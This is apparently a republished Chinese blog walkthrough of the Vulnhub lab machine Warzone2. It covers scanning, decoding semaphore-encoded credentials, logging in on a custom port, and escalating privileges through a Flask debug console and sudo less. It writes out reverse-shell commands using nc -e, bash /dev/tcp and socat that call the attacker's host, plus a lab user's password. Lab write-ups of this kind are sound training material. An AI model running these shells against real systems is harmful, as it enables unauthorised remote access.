Vulnhub靶机渗透测试实战(二):Warzone2
关于vulnhub
Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载
Warzone2 下载地址:http://www.vulnhub.com/entry/warzone-2,598/
安装好虚拟机后挂载Virtualbox运行
主机扫描
netdiscover -r 192.168.244.0/24
![图片[1]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606973893_5fc879c56e7fc7ecdc723.png)
.1是物理机,.2是virtual box的网关,所以目标地址就是.3了
端口扫描
![图片[2]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606973995_5fc87a2b65c83a4bf9ff2.png)
可以发现了 三个端口
访问ftp
发现可以通过匿名的形式进行登录
![图片[3]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974038_5fc87a56c0910fbd1582e.png)
Username.png![图片[4]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974076_5fc87a7cb7ce21148f754.png)
Password.png![图片[5]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974096_5fc87a90673cbed013565.png)
Token.png![图片[6]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974108_5fc87a9c32237e6137037.png)
用户名和密码很明显的旗语加密![图片[7]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974135_5fc87ab724ea5daacb8c0.png)
通过对照表进行解密
Username:semaphore
Pasword:signalperson
Hash:
833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26
Token:38333361643438383436346465316132376435313266313034623633393235386537373930316631346561623730363136333036336433343035346137623236
访问ssh
发现前面的密码并不能登录
访问1337
本来想要百度一下这个端口对应的漏洞有什么,结果并没有什么发现
那通过nc访问吧
root@kali:~# nc 192.168.244.3 1337
# WARZONE 2 # WARZONE 2 # WARZONE 2 #
{SECRET SYSTEM REMOTE ACCESS}
Username :semaphore
Password :signalperson
Token :833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26
Success Login
[SIGNALS] { ls, pwd, nc}
[semaphore] >
输入账号密码,hash成功登录
Ps:这里遇到了一个坑,本来提示的式token,结果试了好半天,居然是hash
反弹shell
看到提示,这里可以使用nc
kali
nc -lvvp 4444
靶机
nc -e /bin/bash 192.168.244.4 4444
过不凄然又是www权限,这里为了方便,重新通过bash反弹一个shell
Kali
nc -lvvp 5555
靶机
bash -i >& /dev/tcp/192.168.244.4/5555 0>&1
信息搜集
![图片[8]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974251_5fc87b2b1054c6ad87f24.png)
找到了flagman用户的密码
![图片[9]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974277_5fc87b45ac205629f1970.png)
登录ssh
![图片[10]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974296_5fc87b5811c6ce0d0f9f1.png)
获取flag1
在该用户的桌面下发现一个flag
![图片[11]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974319_5fc87b6fde7765785aa1a.png)
青铜? 看来还得继续深入
1阶段提权
在passwd文件中发现存在一个admiral用户(管理员用户?)![图片[12]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974348_5fc87b8ced90b98b50dbb.png)
确实是
![图片[13]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974372_5fc87ba4ef5f13e8a8f6d.png)
通过sudo -l查看发现可以通过无密码以admiral身份执行一个文件![图片[14]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974405_5fc87bc5ab78034e48eb1.png)
那就试试![图片[15]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974420_5fc87bd4e60d6a1e9b23e.png)
发现开了一个5000端口的web服务,但是只针对127开放的,外界访问不到,我们需要进行端口转发才可以访问
5000端口?这不是python的flask吗,而且是开发环境,它里面是可以直接执行python代码的,路径是ip/console
端口转发
既然服务器开放了ssh,我们也有了一个用户和密码(flagman i_hate_signals!),直接通过ssh进行端口转发
![图片[16]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974448_5fc87bf075676fc279312.png)
在kali中访问 http://127.0.0.1:5000/console
![图片[17]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974464_5fc87c00c9fb3afcaeaa9.png)
输入刚才启动程序的时候获取的pin
![图片[18]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974484_5fc87c141117dcc34b6d2.png)
这里是一个python环境,通过python反弹shell
![图片[19]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974515_5fc87c339544f4f232430.png)
![图片[20]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974542_5fc87c4eb238b543c327f.png)
获取flag2
在admiral用户的桌面下发现了一个flag
![图片[21]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974568_5fc87c68b6266d03b134c.png)
银牌?还得继续深入
2阶段提权
虽然我们现在是可以使用sudo,但是我们没有admiral的密码,也是用不了sudo命令
刚才的用户给我们提示
继续sudo -l
![图片[22]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974588_5fc87c7c344bb9c49e9b9.png)
可以发现可以通过无密码使用root身份使用这个命令,试一试
![图片[23]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974612_5fc87c9479a7ac600ad3c.png)
摩尔加密。。。
![图片[24]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974628_5fc87ca418341d3ecb4a3.png)
if you read this message means that you are in the warzone 2. i wish you good luck. remember the medals are not the real trophies. the real trophy is that you gain after solving this box. – alienum rules help your teammates never quit keep training
看来这还不是最终的flag,还是需要继续深入
继续提权
我们看一下刚才我们less查看文件的权限
![图片[25]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974652_5fc87cbcd4a2caed97137.png){kind=small}
我们确实是拿到了root的权限
Less的话是可以进行提权的,但是有一个要求是必须是交互式的shell
获取交互式shell
通过测试socat是可以使用的,socat可以创建交互式shell,创建的shell类似于ssh直接登录,非常好用
Kali
socat file:`tty`,raw,echo=0 tcp-listen:8888
靶机
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.244.4:8888
![图片[26]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974712_5fc87cf80302fc528a8fd.png)
![图片[27]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974720_5fc87d00ef5ea16a3979f.png)
![图片[28]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974729_5fc87d09a72fa39f2ca45.png)
![图片[29]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974757_5fc87d25c50b18a5a1e9d.png)
获取最终flag
![图片[30]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974786_5fc87d42d1224110ff1cf.png)
![图片[31]-VULNHUB靶场—–Warzone2 – 作者:刚入圈的伯鉴-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201203/1606974799_5fc87d4f8195d09843510.png)
来源:freebuf.com 2020-12-03 13:57:53 by: 刚入圈的伯鉴
请登录后发表评论
注册